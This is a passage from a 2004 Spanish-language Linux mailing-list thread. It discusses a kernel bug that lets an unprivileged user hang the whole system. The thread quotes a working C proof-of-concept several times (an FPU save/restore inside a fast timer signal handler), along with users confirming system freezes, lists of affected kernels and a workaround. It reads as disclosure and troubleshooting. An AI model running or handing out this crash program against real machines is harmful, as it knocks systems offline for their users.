Gustavo Chaín wrote: >On Sat, 12 Jun 2004 14:14:56 -0400 >Gustavo Chaín <[EMAIL PROTECTED]> wrote: > > > >> El bug permite q un simple programa en C bloquee el sistema, afecta kernels >> 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug" >> >>Código >> >> #include <sys/time.h> >> #include <signal.h> >> #include <unistd.h> >> >> static void Handler(int ignore) >> { >> char fpubuf[108]; >> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); >> write(2, "*", 1); >> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); >> } >> >> int main(int argc, char *argv[]) >> { >> struct itimerval spec; >> signal(SIGALRM, Handler); >> spec.it_interval.tv_sec=0; >> spec.it_interval.tv_usec=100; >> spec.it_value.tv_sec=0; >> spec.it_value.tv_usec=100; >> setitimer(ITIMER_REAL, &spec, NULL); >> while(1) >> write(1, ".", 1); >> >> return 0; >> } >> >> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc >> >>Los kernels q se salvan... >> >>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma >>flotante. >> >> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith >> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille >> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3) >> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2) >> >>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a salvo >>de esto (fueron liberado antes de la publicacion del bug). Segun el redactor >>del articulo lo probo y no tuvo problemas >> >>I assumed this bug was no serious threat before everyone I asked to test this >>code confermed that it did, in fact, froze their systems. When I started >>testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, are >>affected except the ones I had already installed on my system. Even Linux >>2.4.26-gentoo-r1 crashes. >> >>blabla ... >> >>al parecer la solucion es compilar 2.4.25 y parchar con gentoo. >> >> >> >>pseudo traducido de: >>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en >> >> >> >> > >-_- ' funciona > > > Lo Probe en un kernel con parches de debian en la distribución Unstable version 2.4.26, y el sistema se paraliza por completo. ------------ próxima parte ------------ Se ha borrado un adjunto en formato HTML... URL: https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/5542e10a/attachment-0001.htm From [EMAIL PROTECTED] Sat Jun 12 14:56:08 2004 From: [EMAIL PROTECTED] (Felipe Covarrubias Hooper) Date: Sat Jun 12 15:01:25 2004 Subject: Kernel Crash-Exploit descubierto In-Reply-To: <[EMAIL PROTECTED]> References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]>
Gustavo Chaín wrote: >On Sat, 12 Jun 2004 14:14:56 -0400 >Gustavo Chaín <[EMAIL PROTECTED]> wrote: > > > >> El bug permite q un simple programa en C bloquee el sistema, afecta kernels >> 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug" >> >>Código >> >> #include <sys/time.h> >> #include <signal.h> >> #include <unistd.h> >> >> static void Handler(int ignore) >> { >> char fpubuf[108]; >> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); >> write(2, "*", 1); >> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); >> } >> >> int main(int argc, char *argv[]) >> { >> struct itimerval spec; >> signal(SIGALRM, Handler); >> spec.it_interval.tv_sec=0; >> spec.it_interval.tv_usec=100; >> spec.it_value.tv_sec=0; >> spec.it_value.tv_usec=100; >> setitimer(ITIMER_REAL, &spec, NULL); >> while(1) >> write(1, ".", 1); >> >> return 0; >> } >> >> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc >> >>Los kernels q se salvan... >> >>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma >>flotante. >> >> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith >> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille >> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3) >> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2) >> >>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a salvo >>de esto (fueron liberado antes de la publicacion del bug). Segun el redactor >>del articulo lo probo y no tuvo problemas >> >>I assumed this bug was no serious threat before everyone I asked to test this >>code confermed that it did, in fact, froze their systems. When I started >>testing kernels I found that every kernel I tried, 2.4.xx and 2.6.xx, are >>affected except the ones I had already installed on my system. Even Linux >>2.4.26-gentoo-r1 crashes. >> >>blabla ... >> >>al parecer la solucion es compilar 2.4.25 y parchar con gentoo. >> >> >> >>pseudo traducido de: >>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en >> >> >> >> > >-_- ' funciona > > > Lo Probe en un kernel con parches de debian en la distribución Unstable, kernel version 2.4.26, y el sistema se paraliza por completo. ------------ próxima parte ------------ Se ha borrado un adjunto en formato HTML... URL: https://listas.inf.utfsm.cl/pipermail/linux/attachments/20040612/d70409e7/attachment.htm From [EMAIL PROTECTED] Sat Jun 12 15:20:52 2004 From: [EMAIL PROTECTED] (Gustavo =?ISO-8859-1?Q?Cha=EDn?=) Date: Sat Jun 12 15:21:09 2004 Subject: Kernel Crash-Exploit descubierto In-Reply-To: <[EMAIL PROTECTED]> References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> On Sat, 12 Jun 2004 14:56:08 -0400 Felipe Covarrubias Hooper <[EMAIL PROTECTED]> wrote: > Gustavo Chaín wrote: > > >On Sat, 12 Jun 2004 14:14:56 -0400 > >Gustavo Chaín <[EMAIL PROTECTED]> wrote: > > > > > > > >> El bug permite q un simple programa en C bloquee el sistema, afecta > >> kernels 2.4.2x and 2.6.x, el exploit fue reportado como un "gcc bug" > >> > >>Código > >> > >> #include <sys/time.h> > >> #include <signal.h> > >> #include <unistd.h> > >> > >> static void Handler(int ignore) > >> { > >> char fpubuf[108]; > >> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); > >> write(2, "*", 1); > >> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); > >> } > >> > >> int main(int argc, char *argv[]) > >> { > >> struct itimerval spec; > >> signal(SIGALRM, Handler); > >> spec.it_interval.tv_sec=0; > >> spec.it_interval.tv_usec=100; > >> spec.it_value.tv_sec=0; > >> spec.it_value.tv_usec=100; > >> setitimer(ITIMER_REAL, &spec, NULL); > >> while(1) > >> write(1, ".", 1); > >> > >> return 0; > >> } > >> > >> El bug se "manifiesta si es compilado con las versiones 3.2 o 3.3 de gcc > >> > >>Los kernels q se salvan... > >> > >>Aqui el código no hace nada, salvo enviar un error de excepcion en el coma > >>flotante. > >> > >> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith > >> * Linux Kernel 2.6.4 SMP patched with staircase scheduler, Guille > >> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3) > >> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2) > >> > >>No está muy claro pq los parches de gentoo para kernels 2.4.26 estan a > >>salvo de esto (fueron liberado antes de la publicacion del bug). Segun el > >>redactor del articulo lo probo y no tuvo problemas > >> > >>I assumed this bug was no serious threat before everyone I asked to test > >>this code confermed that it did, in fact, froze their systems. When I > >>started testing kernels I found that every kernel I tried, 2.4.xx and > >>2.6.xx, are affected except the ones I had already installed on my system. > >>Even Linux 2.4.26-gentoo-r1 crashes. > >> > >>blabla ... > >> > >>al parecer la solucion es compilar 2.4.25 y parchar con gentoo. > >> > >> > >> > >>pseudo traducido de: > >>http://www.todo-linux.com/go.php?pag=http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en > >> > >> > >> > >> > > > >-_- ' funciona > > > > > > > Lo Probe en un kernel con parches de debian en la distribución Unstable, > kernel version 2.4.26, y el sistema se paraliza por completo. > pero una vez paralizado què?, reinicias y todo como si nunca hubiera pasado?